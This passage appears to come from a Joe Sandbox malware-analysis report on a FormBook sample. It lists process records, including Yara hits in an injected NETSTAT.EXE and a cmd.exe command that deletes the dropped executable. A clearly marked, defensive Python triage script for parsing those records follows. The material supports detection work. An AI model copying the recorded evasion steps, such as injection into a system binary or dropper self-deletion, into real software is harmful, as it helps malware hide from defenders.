                                                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                                                        File size:3933184 bytes
                                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:15:39:14
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                        Imagebase:0x3d0000
                                                                                                                                                        File size:32768 bytes
                                                                                                                                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                        Reputation:moderate

                                                                                                                                                        General

                                                                                                                                                        Start time:15:39:18
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:/c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe'
                                                                                                                                                        Imagebase:0x140000
                                                                                                                                                        File size:232960 bytes
                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:15:39:19
                                                                                                                                                        Start date:27/01/2021
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                        File size:625664 bytes
                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
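Added triage example, not part of the Joe Sandbox report: a Python script that parses process records in the form shown above and pulls out the three facts an analyst takes from them: FormBook Yara hits inside a Windows system binary (NETSTAT.EXE is the injection target here), dumped memory regions whose protection value is 0x40 (PAGE_EXECUTE_READWRITE), and a cmd.exe "/c del" that removes a dropped executable after the payload has migrated. The embedded records are a constructed excerpt of this report; reading the .sdmp name as process index, dump stage, dump id, base address, protection and memory type is an assumption drawn from the values on the page, not something the report documents.

```python
"""Triage helper for Joe Sandbox-style process records (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

PAGE_EXECUTE_READWRITE = 0x40  # Windows memory protection constant

# Assumed layout of a dump name in the report's "Source:" fields:
# <process index>.<dump stage>.<dump id>.<base address>.<protection>.<type>.sdmp
SDMP_RE = re.compile(
    r"Source:\s*([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\."
    r"([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp"
)
RULE_RE = re.compile(r"Rule:\s*([^,]+),")
DEL_RE = re.compile(r"/c\s+del\s+'([^']+)'", re.IGNORECASE)

# Constructed excerpt mirroring the records in this report.
SAMPLE_RECORDS = r"""
General
Path:C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe
Commandline:C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
General
Path:C:\Windows\SysWOW64\NETSTAT.EXE
Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
General
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:/c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe'
"""


@dataclass
class MemoryMatch:
    rule: str
    proc_index: int
    stage: int
    base: int
    protection: int


@dataclass
class ProcessRecord:
    path: str = ""
    commandline: str = ""
    matches: List[MemoryMatch] = field(default_factory=list)


def parse_records(text: str) -> List[ProcessRecord]:
    """Split the flattened 'General' blocks into ProcessRecord objects."""
    records: List[ProcessRecord] = []
    current: Optional[ProcessRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "General":
            current = ProcessRecord()
            records.append(current)
            continue
        if current is None:
            continue
        if line.startswith("Path:"):
            current.path = line[len("Path:"):].strip()
        elif line.startswith("Commandline:"):
            current.commandline = line[len("Commandline:"):].strip()
        elif line.startswith("•") and "Rule:" in line:
            rule, src = RULE_RE.search(line), SDMP_RE.search(line)
            if rule and src:
                current.matches.append(MemoryMatch(
                    rule=rule.group(1).strip(),
                    proc_index=int(src.group(1), 16),
                    stage=int(src.group(2), 16),
                    base=int(src.group(4), 16),
                    protection=int(src.group(5), 16),
                ))
    return records


def triage(text: str) -> Dict[str, list]:
    """Flag injected system processes, RWX regions and dropper self-deletion."""
    records = parse_records(text)
    known_paths = {r.path.lower() for r in records if r.path}
    findings: Dict[str, list] = {
        "injected_system_processes": [], "rwx_regions": [], "self_deleted": []}
    seen_regions = set()
    for r in records:
        # A Windows binary such as NETSTAT.EXE should never carry FormBook code.
        if r.path.lower().startswith("c:\\windows\\") and r.matches:
            findings["injected_system_processes"].append(r.path)
        for m in r.matches:
            key = (r.path, m.base)
            if m.protection == PAGE_EXECUTE_READWRITE and key not in seen_regions:
                seen_regions.add(key)
                findings["rwx_regions"].append(key)
        # cmd.exe /c del '<dropped exe>': the dropper erasing itself after injection.
        d = DEL_RE.search(r.commandline)
        if d and d.group(1).lower() in known_paths:
            findings["self_deleted"].append(d.group(1))
    return findings


if __name__ == "__main__":
    for name, hits in triage(SAMPLE_RECORDS).items():
        print(name, hits)
```

The 0x40 check is the one worth keeping in a real pipeline: FormBook's hollowed image at 0x400000 in the dropper and its copy at 0x32D0000 in NETSTAT.EXE both appear as writable and executable, which no legitimate module of those processes should be.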

Disassembly

Code Analysis